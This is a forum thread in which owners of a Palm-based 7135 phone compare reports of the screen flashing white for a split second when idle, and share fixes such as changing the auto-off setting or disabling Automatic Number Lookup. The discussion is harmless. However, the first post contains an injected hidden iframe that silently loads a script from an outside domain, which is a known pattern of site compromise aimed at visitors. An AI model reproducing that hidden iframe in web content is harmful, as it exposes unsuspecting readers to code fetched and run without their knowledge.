+ Reply to Thread

Periodic Blinking Screen

This is a question to those who have the 7135.

If you leave the device open and let the Palm automatically turn off after whatever time you've set in Pref-PDA, does your screen periodically blink on/off (every few minutes) for a split-second?

Or is it just my phone that does that?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Mine does too. Blank white screen just for a split second. Mine is always in the cradle when I notice this.

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

blinking screen

mine does to also while in the cradle
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Is the split second like a Flash? (As if the first few times you weren't sure it did it.) or was it more like a quick on.off.
    For years, most of my laptops have done this Flash after the screen shuts off. I have a home office and sometimes its hard to get out of the office. :eyecrazy It still gets me sometimes...
    Its got to be some tiny extra drain on the battery thou. I attributed it to on the laptops with either
    1. some kind of discharge at the backlight's switch.
    2 some kind of static discharge in the cathode ray tube that backlights the display.
    3. some kind of event stopped loop in the code thats controlling the switch.

Thanks for the heads up. :upsidedow I think we'll all have to be monitoring our power usage with this device as " it ain't no 6035"

Hey by the way... I'm gonna check if that Battery log program written with th 6035 in mind has been updated. :thinkerg

Yeah, it's a flash. I first saw it happen in the cradle but today I saw it happen just sitting on my desk.

Converged. It didn't even hurt! tuckeyr's Avatar

Periodic Blinking Screen

To those of you who experienced this blinking screen, did anyone figure out the cause? Mine never does this, but a friend's 7135 is doing it - brand new phone. Did upgrades resolve it?

yea,

my screen blinks too.

Usually I notice it outside of the cradle, flip open.

It's just a split second, almost like a haluncination.

Has anyone figured out the cause ?

I solved it by setting
    Palm Preferences...
    General >
    Off After: Never when open (unless I'm not looking)

sorta like the rejiferater door/light/tree/forest/ re-sound thing.

<aka.bugle>

Mine got this blinking flash whenever I opened it for about 2 days. It happened for a while with my first phone before they replaced it. But that wasn't the issue.

It seems to flash white, (white anyway but just blank), with a small outlined squar at upper left. Sometimes I could see an ok and accept buttons at the bottom of the screen but it was too quick to select anything. During this, if I was in palm mode, an asterisk would flash intermittently at the top left menu. Clicking on that made this anomaly occur as well. I don' know what app was causing this or whether it was an alarm item. But I couldn't find any events causing it. Anyone see this before?

I had the white screen coming on after opening the phone. The screen would stay white except for the numbers or hour. After pressing the home button or the END button the screen returns to normal.

My fix was to disable Automatic Number Lookup. I have over 3000 addresses.